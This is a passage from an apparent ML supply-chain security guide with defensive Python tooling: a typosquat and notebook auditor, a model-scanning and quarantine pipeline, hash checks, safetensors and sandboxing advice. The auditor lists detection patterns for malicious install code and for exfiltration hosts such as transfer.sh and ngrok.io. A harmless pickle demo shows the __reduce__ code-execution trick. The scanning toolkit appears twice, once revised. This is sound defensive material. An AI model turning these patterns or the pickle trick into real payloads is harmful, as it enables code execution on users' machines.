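Two pip-level mitigations follow directly from these attack patterns: hash-checking mode, which makes pip refuse any artifact whose digest is not listed, and an explicit index URL so resolution never falls back to public PyPI. The package name, index URL, and digest below are placeholders:

```shell
# requirements.txt entries pin the version AND the artifact digest, e.g.:
#   numpy==1.26.4 --hash=sha256:<digest-from-your-trusted-lockfile>
# --require-hashes makes pip reject anything unhashed or mismatched:
pip install --require-hashes -r requirements.txt

# Pin the internal index explicitly so private package names
# never resolve against public PyPI:
pip install --index-url https://pypi.internal.example/simple/ company-ml-utils
```

Hash-checking mode also neutralises post-install hooks from substituted packages: a swapped-in archive has a different digest and is rejected before setup.py ever runs.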

Malicious Notebooks

Jupyter notebooks shared on GitHub, Kaggle, or Google Colab are a significant vector:

  • Notebooks commonly begin with !pip install cells that users execute reflexively
  • Obfuscated code can be hidden in long data processing cells
  • Notebooks can download and execute remote scripts via urllib or requests
  • Kaggle and Colab environments provide internet access and compute resources that attackers can leverage
ml_dependency_auditor.py
python
# AI/ML dependency confusion attack demonstration
# Shows how attackers exploit Python package management in ML pipelines
import json
import re
from pathlib import Path
from typing import Optional

class MLDependencyAuditor:
    """
    Audits ML project dependencies for supply chain risks.
    Checks for known attack patterns in pip, conda, and notebook environments.
    """
    
    # Known patterns of malicious ML packages (typosquats)
    KNOWN_TYPOSQUATS = {
        "pytorch":   ["py-torch", "pytorche", "pytorch-gpu", "torch-nightly-unofficial"],
        "tensorflow":["tenserflow", "tensorflow-gpu-official", "tf-nightly-unofficial"],
        "transformers": ["transformer", "huggingface-transformers", "hf-transformers"],
        "numpy":     ["numppy", "numpy-python", "numpi"],
        "pandas":    ["panda", "pandass", "pandas-python"],
        "scikit-learn": ["sklearn", "scikit_learn", "sk-learn"],
        "tokenizers": ["tokenizer", "hf-tokenizers"],
        "safetensors": ["safe-tensors", "safetensor", "safe_tensor"],
        "accelerate": ["acclerate", "acceleratte"],
        "datasets":  ["dataset", "hf-datasets"],
    }
    
    # Suspicious setup.py patterns
    SUSPICIOUS_SETUP_PATTERNS = [
        r'os\.system\s*\(',
        r'subprocess\.(call|run|Popen)',
        r'urllib\.request\.urlretrieve',
        r'exec\s*\(',
        r'eval\s*\(',
        r'__import__\s*\(',
        r'socket\.socket',
        r'http\.server',
        r'base64\.b64decode',
    ]
    
    def audit_requirements(self, req_file: str) -> list[dict]:
        """Scan requirements.txt for supply chain risks."""
        findings = []
        path = Path(req_file)
        
        if not path.exists():
            return [{"severity": "error", "message": f"File not found: {req_file}"}]
        
        with open(path) as f:
            for line_num, line in enumerate(f, 1):
                line = line.strip()
                if not line or line.startswith('#'):
                    continue
                
                # Extract package name
                pkg_name = re.split(r'[>=<!\[;]', line)[0].strip()
                
                # Check against known typosquats
                for legit, squats in self.KNOWN_TYPOSQUATS.items():
                    if pkg_name.lower() in [s.lower() for s in squats]:
                        findings.append({
                            "severity": "critical",
                            "line": line_num,
                            "package": pkg_name,
                            "message": f"Possible typosquat of '{legit}'"
                        })
                
                # Flag anything not pinned to an exact version
                # ('>=' still floats, so only '==' counts as pinned)
                if '==' not in line:
                    findings.append({
                        "severity": "warning",
                        "line": line_num,
                        "package": pkg_name,
                        "message": "Unpinned version - vulnerable to dependency confusion"
                    })
                
                # Check for --index-url or --extra-index-url
                if '--extra-index-url' in line or '--index-url' in line:
                    findings.append({
                        "severity": "high",
                        "line": line_num,
                        "package": pkg_name,
                        "message": "Custom package index specified - verify legitimacy"
                    })
        
        return findings
    
    def audit_notebook(self, notebook_path: str) -> list[dict]:
        """Scan Jupyter notebook for dangerous installs and imports."""
        findings = []
        
        with open(notebook_path) as f:
            nb = json.load(f)
        
        for cell_idx, cell in enumerate(nb.get('cells', [])):
            if cell['cell_type'] != 'code':
                continue
            
            source = ''.join(cell.get('source', []))
            
            # Check for pip install commands (both ! shell and %pip magic forms)
            pip_installs = re.findall(
                r'[!%]pip install\s+(.+?)(?:\n|$)', source
            )
            for install in pip_installs:
                # Skip option flags like -q or --upgrade
                pkgs = [p for p in install.split() if not p.startswith('-')]
                for pkg in pkgs:
                    pkg_clean = re.split(r'[>=<!]', pkg)[0]
                    for legit, squats in self.KNOWN_TYPOSQUATS.items():
                        if pkg_clean.lower() in [s.lower() for s in squats]:
                            findings.append({
                                "severity": "critical",
                                "cell": cell_idx,
                                "message": f"Typosquat pip install: '{pkg_clean}' "
                                           f"(intended: '{legit}')"
                            })
            
            # Check for suspicious URL downloads in code
            urls = re.findall(r'https?://[^\s\'\")]+', source)
            for url in urls:
                if any(sus in url for sus in [
                    'pastebin', 'raw.github', 'gist.github',
                    'transfer.sh', 'ngrok.io'
                ]):
                    findings.append({
                        "severity": "high",
                        "cell": cell_idx,
                        "message": f"Suspicious URL in notebook: {url}"
                    })
        
        return findings


# --- Usage ---
if __name__ == "__main__":
    auditor = MLDependencyAuditor()
    
    # Audit a requirements file
    req_findings = auditor.audit_requirements("requirements.txt")
    for f in req_findings:
        severity = f["severity"].upper()
        print(f"[{severity}] Line {f.get('line', '?')}: {f['message']}")
    
    # Audit a Jupyter notebook
    nb_findings = auditor.audit_notebook("training_pipeline.ipynb")
    for f in nb_findings:
        severity = f["severity"].upper()
        print(f"[{severity}] Cell {f.get('cell', '?')}: {f['message']}")

8. Defense and Detection

A layered defense strategy is essential for securing the ML supply chain. No single tool addresses all attack vectors — organisations must combine format-level protections, scanning tools, integrity verification, and operational controls.

graph TB subgraph Prevention["Prevention Layer"] SAFET[Use Safetensors Format] HASH[Cryptographic Hash Verification] SANDBOX[Sandboxed Model Loading] SIGN[Model Signing] end subgraph Detection["Detection Layer"] MSCAN[ModelScan Analysis] FICKLE[Fickling Pickle Inspection] SBOM[ML-BOM Generation] STATIC[Static Weight Analysis] end subgraph Response["Response Layer"] QUARANTINE[Model Quarantine] ALERT[Security Alert Pipeline] ROLLBACK[Version Rollback] FORENSIC[Forensic Analysis] end SAFET --> MSCAN HASH --> MSCAN SANDBOX --> FICKLE SIGN --> SBOM MSCAN --> QUARANTINE FICKLE --> ALERT SBOM --> ROLLBACK STATIC --> FORENSIC style Prevention fill:#0f3460,stroke:#00ff41,color:#fff style Detection fill:#16213e,stroke:#0ff,color:#fff style Response fill:#1a1a2e,stroke:#ff8c00,color:#fff

ModelScan

ModelScan by Protect AI is an open-source tool that detects unsafe operations in serialized ML models. It supports pickle, PyTorch, TensorFlow, Keras, and ONNX formats. Integrate ModelScan into your CI/CD pipeline to automatically scan model artifacts before deployment.

Fickling

Fickling by Trail of Bits performs static analysis on pickle files. It can decompile pickle bytecode to equivalent Python source, enabling manual review of what the pickle file does when loaded. This is invaluable for analysing suspected backdoored models.

Safetensors Adoption

The single most impactful defence is migrating to the safetensors format, which eliminates deserialization code execution entirely:

  • Convert existing pickle models: from safetensors.torch import save_file
  • Load with confidence: safetensors only reads tensor data and JSON metadata
  • HuggingFace Hub now defaults to safetensors for new uploads
  • Zero-copy loading improves performance compared to pickle
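The format's safety comes from its simplicity: an 8-byte little-endian header length, a JSON header, then raw tensor bytes — nothing executable anywhere. A pure-stdlib sketch of that layout (real tooling should use the safetensors library itself; the single tensor here is illustrative):

```python
import json
import struct

def write_safetensors_like(path: str, name: str, raw: bytes,
                           dtype: str = "F32", shape=(4,)) -> None:
    """Write a minimal safetensors-style file: length prefix, JSON header, data."""
    header = {name: {"dtype": dtype, "shape": list(shape),
                     "data_offsets": [0, len(raw)]}}
    hjson = json.dumps(header).encode()
    with open(path, "wb") as f:
        f.write(struct.pack("<Q", len(hjson)) + hjson + raw)

def read_header(path: str) -> dict:
    """Parse only the JSON header - there is no code path that executes anything."""
    with open(path, "rb") as f:
        (hlen,) = struct.unpack("<Q", f.read(8))
        return json.loads(f.read(hlen))

raw = struct.pack("<4f", 1.0, 2.0, 3.0, 4.0)   # four float32 values = 16 bytes
write_safetensors_like("demo.safetensors", "weight", raw)
print(read_header("demo.safetensors"))
# {'weight': {'dtype': 'F32', 'shape': [4], 'data_offsets': [0, 16]}}
```

Contrast this with pickle: the worst a malformed safetensors header can do is fail JSON parsing, whereas a malformed pickle can do anything the Python process can.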

Hash Verification

Always verify SHA-256 hashes of downloaded model files against the publisher's documented values. Automate this in your model download pipeline — never load a model file that has not passed integrity verification.

Sandboxed Model Loading

When you must load pickle-format models (e.g., legacy models without safetensors versions), use sandboxing:

  • Container isolation — load models inside ephemeral containers with no network access and minimal filesystem permissions.
  • gVisor or Firecracker — use microVM or sandboxed container runtimes that restrict syscall access during model loading.
  • torch.load(weights_only=True) — available since PyTorch 1.13 and the default from 2.6, this restricts unpickling to tensor data and an allowlist of safe types rather than arbitrary objects. Use it whenever the model architecture is already defined in code.
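A minimal invocation for the container-isolation pattern — the image tag, mount paths, and inspect_model.py script are placeholders for your own setup:

```shell
# Ephemeral container: no network, read-only rootfs, model dir mounted read-only.
# If the pickle payload fires, it has no network to exfiltrate over and
# nothing persistent to write to; the container is discarded afterwards.
docker run --rm --network none --read-only --tmpfs /tmp \
  -v "$PWD/models:/models:ro" \
  python:3.11-slim \
  python /models/inspect_model.py
```

Combining layers is cheap: run the load inside the container *and* with weights_only=True, so a sandbox escape and an unpickler bypass would both be required.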

ML-BOM (Machine Learning Bill of Materials)

Adapting the Software BOM (SBOM) concept for ML, an ML-BOM tracks:

  • Model provenance: training data sources, framework version, training configuration
  • Artifact integrity: cryptographic hashes of all model files
  • Security scan results: output from ModelScan, Fickling, and other analysis tools
  • Dependency inventory: all Python packages and their versions in the training environment
  • Licence and compliance: data licensing, model licensing, export control classification
ml_supply_chain_defense.py
python
# Defense toolkit: scanning, verifying, and securing ML model artifacts
# Integrates ModelScan, Fickling, hash verification, and ML-BOM generation
import hashlib
import json
import subprocess
import sys
from datetime import datetime, timezone
from pathlib import Path
from typing import Optional

class MLSupplyChainDefense:
    """
    Comprehensive defense toolkit for ML supply chain security.
    Wraps multiple open-source tools into a unified scanning pipeline.
    """
    
    def __init__(self, quarantine_dir: str = "./quarantine"):
        self.quarantine_dir = Path(quarantine_dir)
        self.quarantine_dir.mkdir(parents=True, exist_ok=True)
        self.scan_results: list[dict] = []
    
    # ─── ModelScan Integration ───
    
    def run_modelscan(self, model_path: str) -> dict:
        """
        Run ModelScan (https://github.com/protectai/modelscan)
        Detects unsafe operations in serialized ML models.
        pip install modelscan
        """
        result = {
            "tool": "modelscan",
            "target": model_path,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "status": "unknown",
            "issues": [],
        }
        
        try:
            proc = subprocess.run(
                ["modelscan", "--path", model_path, "--output", "json"],
                capture_output=True, text=True, timeout=300
            )
            
            if proc.returncode == 0:
                scan_output = json.loads(proc.stdout)
                issues = scan_output.get("issues", [])
                result["status"] = "clean" if not issues else "unsafe"
                result["issues"] = issues
            else:
                result["status"] = "error"
                result["issues"] = [{"error": proc.stderr}]
                
        except FileNotFoundError:
            result["status"] = "tool_missing"
            result["issues"] = [{"error": "modelscan not installed"}]
        except subprocess.TimeoutExpired:
            result["status"] = "timeout"
        
        self.scan_results.append(result)
        return result
    
    # ─── Fickling Integration ───
    
    def run_fickling(self, pickle_path: str) -> dict:
        """
        Run Fickling (https://github.com/trailofbits/fickling)
        Static analysis of pickle files for malicious content.
        pip install fickling
        """
        result = {
            "tool": "fickling",
            "target": pickle_path,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "status": "unknown",
            "issues": [],
        }
        
        try:
            # Check safety
            proc = subprocess.run(
                ["fickling", "--check-safety", pickle_path],
                capture_output=True, text=True, timeout=120
            )
            
            if "unsafe" in proc.stdout.lower() or "unsafe" in proc.stderr.lower():
                result["status"] = "unsafe"
                result["issues"].append({
                    "severity": "critical",
                    "detail": proc.stdout.strip()
                })
            else:
                result["status"] = "clean"
            
            # Decompile to Python for manual review
            decompile_proc = subprocess.run(
                ["fickling", "--trace", pickle_path],
                capture_output=True, text=True, timeout=120
            )
            result["decompiled"] = decompile_proc.stdout[:5000]
            
        except FileNotFoundError:
            result["status"] = "tool_missing"
            result["issues"] = [{"error": "fickling not installed"}]
        except subprocess.TimeoutExpired:
            result["status"] = "timeout"
        
        self.scan_results.append(result)
        return result
    
    # ─── Hash Verification ───
    
    def verify_hash(
        self, model_path: str, expected_sha256: str
    ) -> dict:
        """Verify model file integrity via SHA-256."""
        result = {
            "tool": "hash_verify",
            "target": model_path,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "expected": expected_sha256,
        }
        
        sha256 = hashlib.sha256()
        with open(model_path, 'rb') as f:
            for chunk in iter(lambda: f.read(8192), b''):
                sha256.update(chunk)
        
        actual = sha256.hexdigest()
        result["actual"] = actual
        result["match"] = actual == expected_sha256
        result["status"] = "verified" if result["match"] else "MISMATCH"
        
        if not result["match"]:
            result["issues"] = [{
                "severity": "critical",
                "detail": f"Hash mismatch: expected {expected_sha256}, got {actual}"
            }]
        
        self.scan_results.append(result)
        return result
    
    # ─── ML-BOM Generation ───
    
    def generate_mlbom(
        self, model_path: str, model_name: str,
        source_url: Optional[str] = None,
        framework: Optional[str] = None,
    ) -> dict:
        """
        Generate an ML Bill of Materials (ML-BOM) for a model artifact.
        Based on CycloneDX ML extension concepts.
        """
        path = Path(model_path)
        sha256 = hashlib.sha256()
        with open(path, 'rb') as f:
            for chunk in iter(lambda: f.read(8192), b''):
                sha256.update(chunk)
        
        mlbom = {
            "mlbom_version": "1.0",
            "generated": datetime.now(timezone.utc).isoformat(),
            "model": {
                "name": model_name,
                "file": str(path.name),
                "format": path.suffix,
                "size_bytes": path.stat().st_size,
                "sha256": sha256.hexdigest(),
            },
            "source": {
                "url": source_url or "unknown",
                "download_date": datetime.now(timezone.utc).isoformat(),
            },
            "framework": framework or "unknown",
            "security_scans": [
                {
                    "tool": r["tool"],
                    "status": r["status"],
                    "timestamp": r["timestamp"],
                }
                for r in self.scan_results
                if r["target"] == model_path
            ],
        }
        
        # Save ML-BOM alongside model
        bom_path = path.with_suffix('.mlbom.json')
        with open(bom_path, 'w') as f:
            json.dump(mlbom, f, indent=2)
        
        return mlbom
    
    # ─── Quarantine ───
    
    def quarantine_model(self, model_path: str, reason: str) -> str:
        """Move a suspicious model to quarantine directory."""
        src = Path(model_path)
        dest = self.quarantine_dir / f"{src.stem}_quarantined{src.suffix}"
        src.rename(dest)
        
        # Write quarantine metadata
        meta = {
            "original_path": str(src),
            "quarantined_at": datetime.now(timezone.utc).isoformat(),
            "reason": reason,
        }
        meta_path = dest.with_suffix('.quarantine.json')
        with open(meta_path, 'w') as f:
            json.dump(meta, f, indent=2)
        
        return str(dest)
    
    # ─── Full Pipeline ───
    
    def full_scan_pipeline(
        self, model_path: str, expected_hash: Optional[str] = None
    ) -> dict:
        """Run complete supply chain security scan pipeline."""
        results = {"model": model_path, "scans": []}
        
        # Step 1: Hash check (if expected hash provided)
        if expected_hash:
            hash_result = self.verify_hash(model_path, expected_hash)
            results["scans"].append(hash_result)
            if hash_result["status"] == "MISMATCH":
                quarantine_path = self.quarantine_model(
                    model_path, "Hash verification failed"
                )
                results["quarantined"] = quarantine_path
                return results
        
        # Step 2: Format-specific scanning
        path = Path(model_path)
        if path.suffix in ('.pt', '.pth', '.bin', '.pkl'):
            results["scans"].append(self.run_modelscan(model_path))
            results["scans"].append(self.run_fickling(model_path))
        elif path.suffix == '.safetensors':
            results["scans"].append(self.run_modelscan(model_path))
        elif path.suffix == '.gguf':
            results["scans"].append({"tool": "gguf_check", "status": "safe"})
        
        # Step 3: Quarantine if any scan found issues
        has_issues = any(
            s.get("status") in ("unsafe", "MISMATCH")
            for s in results["scans"]
        )
        if has_issues:
            quarantine_path = self.quarantine_model(
                model_path, "Security scan detected issues"
            )
            results["quarantined"] = quarantine_path
        
        return results


# --- Usage ---
if __name__ == "__main__":
    defense = MLSupplyChainDefense()
    
    model = sys.argv[1] if len(sys.argv) > 1 else "model.pt"
    expected = sys.argv[2] if len(sys.argv) > 2 else None
    
    print(f"Scanning: {model}")
    result = defense.full_scan_pipeline(model, expected)
    print(json.dumps(result, indent=2))
    
    # Generate ML-BOM
    bom = defense.generate_mlbom(
        model, "example-model",
        source_url="https://huggingface.co/example/model",
        framework="pytorch"
    )
    print(f"\nML-BOM generated: {json.dumps(bom, indent=2)}")
# Defense toolkit: scanning, verifying, and securing ML model artifacts
# Integrates ModelScan, Fickling, hash verification, and ML-BOM generation
import hashlib
import json
import subprocess
import sys
from datetime import datetime, timezone
from pathlib import Path
from typing import Optional

class MLSupplyChainDefense:
    """
    Comprehensive defense toolkit for ML supply chain security.
    Wraps multiple open-source tools into a unified scanning pipeline.
    """
    
    def __init__(self, quarantine_dir: str = "./quarantine"):
        self.quarantine_dir = Path(quarantine_dir)
        self.quarantine_dir.mkdir(parents=True, exist_ok=True)
        self.scan_results: list[dict] = []
    
    # ─── ModelScan Integration ───
    
    def run_modelscan(self, model_path: str) -> dict:
        """
        Run ModelScan (https://github.com/protectai/modelscan)
        Detects unsafe operations in serialized ML models.
        pip install modelscan
        """
        result = {
            "tool": "modelscan",
            "target": model_path,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "status": "unknown",
            "issues": [],
        }
        
        try:
            # NOTE: CLI flags vary across modelscan releases; check
            # `modelscan --help` for the installed version
            proc = subprocess.run(
                ["modelscan", "--path", model_path, "--output", "json"],
                capture_output=True, text=True, timeout=300
            )
            
            # modelscan exits non-zero when issues are found, so attempt to
            # parse the JSON report regardless of the return code
            try:
                scan_output = json.loads(proc.stdout)
                issues = scan_output.get("issues", [])
                result["status"] = "clean" if not issues else "unsafe"
                result["issues"] = issues
            except json.JSONDecodeError:
                result["status"] = "error"
                result["issues"] = [{"error": proc.stderr or proc.stdout}]
                
        except FileNotFoundError:
            result["status"] = "tool_missing"
            result["issues"] = [{"error": "modelscan not installed"}]
        except subprocess.TimeoutExpired:
            result["status"] = "timeout"
        
        self.scan_results.append(result)
        return result
    
    # ─── Fickling Integration ───
    
    def run_fickling(self, pickle_path: str) -> dict:
        """
        Run Fickling (https://github.com/trailofbits/fickling)
        Static analysis of pickle files for malicious content.
        pip install fickling
        """
        result = {
            "tool": "fickling",
            "target": pickle_path,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "status": "unknown",
            "issues": [],
        }
        
        try:
            # Check safety
            proc = subprocess.run(
                ["fickling", "--check-safety", pickle_path],
                capture_output=True, text=True, timeout=120
            )
            
            if "unsafe" in proc.stdout.lower() or "unsafe" in proc.stderr.lower():
                result["status"] = "unsafe"
                result["issues"].append({
                    "severity": "critical",
                    "detail": proc.stdout.strip()
                })
            else:
                result["status"] = "clean"
            
            # Trace pickle interpretation (without executing it) for manual review
            trace_proc = subprocess.run(
                ["fickling", "--trace", pickle_path],
                capture_output=True, text=True, timeout=120
            )
            result["trace"] = trace_proc.stdout[:5000]
            
        except FileNotFoundError:
            result["status"] = "tool_missing"
            result["issues"] = [{"error": "fickling not installed"}]
        except subprocess.TimeoutExpired:
            result["status"] = "timeout"
        
        self.scan_results.append(result)
        return result
    
    # ─── Hash Verification ───
    
    def verify_hash(
        self, model_path: str, expected_sha256: str
    ) -> dict:
        """Verify model file integrity via SHA-256."""
        result = {
            "tool": "hash_verify",
            "target": model_path,
            "timestamp": datetime.now(timezone.utc).isoformat(),
            "expected": expected_sha256,
        }
        
        sha256 = hashlib.sha256()
        with open(model_path, 'rb') as f:
            for chunk in iter(lambda: f.read(8192), b''):
                sha256.update(chunk)
        
        actual = sha256.hexdigest()
        result["actual"] = actual
        result["match"] = actual == expected_sha256
        result["status"] = "verified" if result["match"] else "MISMATCH"
        
        if not result["match"]:
            result["issues"] = [{
                "severity": "critical",
                "detail": f"Hash mismatch: expected {expected_sha256}, got {actual}"
            }]
        
        self.scan_results.append(result)
        return result
    
    # ─── ML-BOM Generation ───
    
    def generate_mlbom(
        self, model_path: str, model_name: str,
        source_url: Optional[str] = None,
        framework: Optional[str] = None,
    ) -> dict:
        """
        Generate an ML Bill of Materials (ML-BOM) for a model artifact.
        Based on CycloneDX ML extension concepts.
        """
        path = Path(model_path)
        sha256 = hashlib.sha256()
        with open(path, 'rb') as f:
            for chunk in iter(lambda: f.read(8192), b''):
                sha256.update(chunk)
        
        mlbom = {
            "mlbom_version": "1.0",
            "generated": datetime.now(timezone.utc).isoformat(),
            "model": {
                "name": model_name,
                "file": str(path.name),
                "format": path.suffix,
                "size_bytes": path.stat().st_size,
                "sha256": sha256.hexdigest(),
            },
            "source": {
                "url": source_url or "unknown",
                "download_date": datetime.now(timezone.utc).isoformat(),
            },
            "framework": framework or "unknown",
            "security_scans": [
                {
                    "tool": r["tool"],
                    "status": r["status"],
                    "timestamp": r["timestamp"],
                }
                for r in self.scan_results
                if r["target"] == model_path
            ],
        }
        
        # Save ML-BOM alongside model
        bom_path = path.with_suffix('.mlbom.json')
        with open(bom_path, 'w') as f:
            json.dump(mlbom, f, indent=2)
        
        return mlbom
    
    # ─── Quarantine ───
    
    def quarantine_model(self, model_path: str, reason: str) -> str:
        """Move a suspicious model to quarantine directory."""
        src = Path(model_path)
        dest = self.quarantine_dir / f"{src.stem}_quarantined{src.suffix}"
        src.rename(dest)
        
        # Write quarantine metadata
        meta = {
            "original_path": str(src),
            "quarantined_at": datetime.now(timezone.utc).isoformat(),
            "reason": reason,
        }
        meta_path = dest.with_suffix('.quarantine.json')
        with open(meta_path, 'w') as f:
            json.dump(meta, f, indent=2)
        
        return str(dest)
    
    # ─── Full Pipeline ───
    
    def full_scan_pipeline(
        self, model_path: str, expected_hash: Optional[str] = None
    ) -> dict:
        """Run complete supply chain security scan pipeline."""
        results = {"model": model_path, "scans": []}
        
        # Step 1: Hash check (if expected hash provided)
        if expected_hash:
            hash_result = self.verify_hash(model_path, expected_hash)
            results["scans"].append(hash_result)
            if hash_result["status"] == "MISMATCH":
                quarantine_path = self.quarantine_model(
                    model_path, "Hash verification failed"
                )
                results["quarantined"] = quarantine_path
                return results
        
        # Step 2: Format-specific scanning
        path = Path(model_path)
        if path.suffix in ('.pt', '.pth', '.bin', '.pkl'):
            results["scans"].append(self.run_modelscan(model_path))
            results["scans"].append(self.run_fickling(model_path))
        elif path.suffix == '.safetensors':
            results["scans"].append(self.run_modelscan(model_path))
        elif path.suffix == '.gguf':
            # GGUF is not a pickle-based format, so no opcode scan applies;
            # a real check should still validate the GGUF header/magic bytes
            results["scans"].append({"tool": "gguf_check", "status": "clean"})
        
        # Step 3: Quarantine if any scan found issues
        has_issues = any(
            s.get("status") in ("unsafe", "MISMATCH")
            for s in results["scans"]
        )
        if has_issues:
            quarantine_path = self.quarantine_model(
                model_path, "Security scan detected issues"
            )
            results["quarantined"] = quarantine_path
        
        return results


# --- Usage ---
if __name__ == "__main__":
    defense = MLSupplyChainDefense()
    
    model = sys.argv[1] if len(sys.argv) > 1 else "model.pt"
    expected = sys.argv[2] if len(sys.argv) > 2 else None
    
    print(f"Scanning: {model}")
    result = defense.full_scan_pipeline(model, expected)
    print(json.dumps(result, indent=2))
    
    # Generate ML-BOM (skip if the model was quarantined, since the
    # file has been moved and can no longer be hashed in place)
    if "quarantined" not in result:
        bom = defense.generate_mlbom(
            model, "example-model",
            source_url="https://huggingface.co/example/model",
            framework="pytorch"
        )
        print(f"\nML-BOM generated: {json.dumps(bom, indent=2)}")
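The `gguf_check` step in the pipeline above returns a static result without inspecting the file. As a sketch of what a real check might do, the snippet below validates the 4-byte `GGUF` magic and reads the version field (the magic bytes and little-endian `uint32` version follow the GGUF spec; the `check_gguf_header` name and return shape are our own, chosen to match the pipeline's scan-result dicts):

```python
# Minimal GGUF header validation: confirm the magic bytes and read the
# format version. This catches pickle files renamed to .gguf, but it is
# not a full parse of the tensor/metadata sections.
import struct
from pathlib import Path

GGUF_MAGIC = b"GGUF"  # first 4 bytes of every valid GGUF file

def check_gguf_header(path: str) -> dict:
    with open(path, "rb") as f:
        data = f.read(8)
    if len(data) < 8 or data[:4] != GGUF_MAGIC:
        return {"tool": "gguf_check", "status": "unsafe",
                "issues": [{"detail": "missing GGUF magic bytes"}]}
    version = struct.unpack("<I", data[4:8])[0]  # little-endian uint32
    return {"tool": "gguf_check", "status": "clean", "version": version}

if __name__ == "__main__":
    # Fabricate a minimal valid header purely for demonstration
    Path("demo.gguf").write_bytes(GGUF_MAGIC + struct.pack("<I", 3))
    print(check_gguf_header("demo.gguf")["status"])  # clean
```

A result from this function can be appended to `results["scans"]` in place of the static stub, and its `"unsafe"` status will trigger the same quarantine path as the other scanners.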
🎯 AI Supply Chain Security Labs

Hands-on exercises for identifying, scanning, and defending against AI supply chain attacks. These labs build practical detection and defense skills.

🔧 Pickle Model File Analysis and Scanning (Custom Lab, medium)

- Pickle opcode inspection with pickletools
- Fickling static analysis
- ModelScan automated scanning
- Safetensors conversion and verification

🔧 HuggingFace Supply Chain Audit (Custom Lab, hard)

- Model repository provenance analysis
- Typosquat detection scripting
- trust_remote_code security review
- ML-BOM generation for downloaded models

🔧 ML Dependency Confusion Attack Simulation (Custom Lab, hard)

- Private package namespace auditing
- requirements.txt typosquat scanning
- Notebook pip install analysis
- pip configuration hardening with index-url restrictions
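As a warm-up for the first lab: a suspicious pickle can be triaged without ever loading it by walking its opcode stream with the stdlib pickletools module. Any `GLOBAL`/`STACK_GLOBAL` opcode followed by `REDUCE` means the file imports and calls something at load time. A minimal sketch (the flagged-opcode set is illustrative, not exhaustive, and benign pickles of class instances will also trigger it):

```python
# Static pickle triage with stdlib pickletools: flag opcodes that import
# and invoke arbitrary callables at load time. The file is never unpickled.
import io
import pickle
import pickletools

SUSPICIOUS = {"GLOBAL", "STACK_GLOBAL", "REDUCE", "INST", "OBJ"}

def scan_pickle_bytes(data: bytes) -> dict:
    hits = []
    for opcode, arg, pos in pickletools.genops(io.BytesIO(data)):
        if opcode.name in SUSPICIOUS:
            hits.append({"opcode": opcode.name, "arg": repr(arg), "pos": pos})
    return {"status": "unsafe" if hits else "clean", "hits": hits}

if __name__ == "__main__":
    benign = pickle.dumps({"weights": [0.1, 0.2]})
    print(scan_pickle_bytes(benign)["status"])  # clean

    class Evil:
        def __reduce__(self):
            # dumps() only records this call; nothing runs until load time
            return (print, ("pwned",))
    print(scan_pickle_bytes(pickle.dumps(Evil()))["status"])  # unsafe
```

Because the scanner only reads opcodes, it is safe to run on untrusted files; tools like Fickling apply the same idea with far richer heuristics.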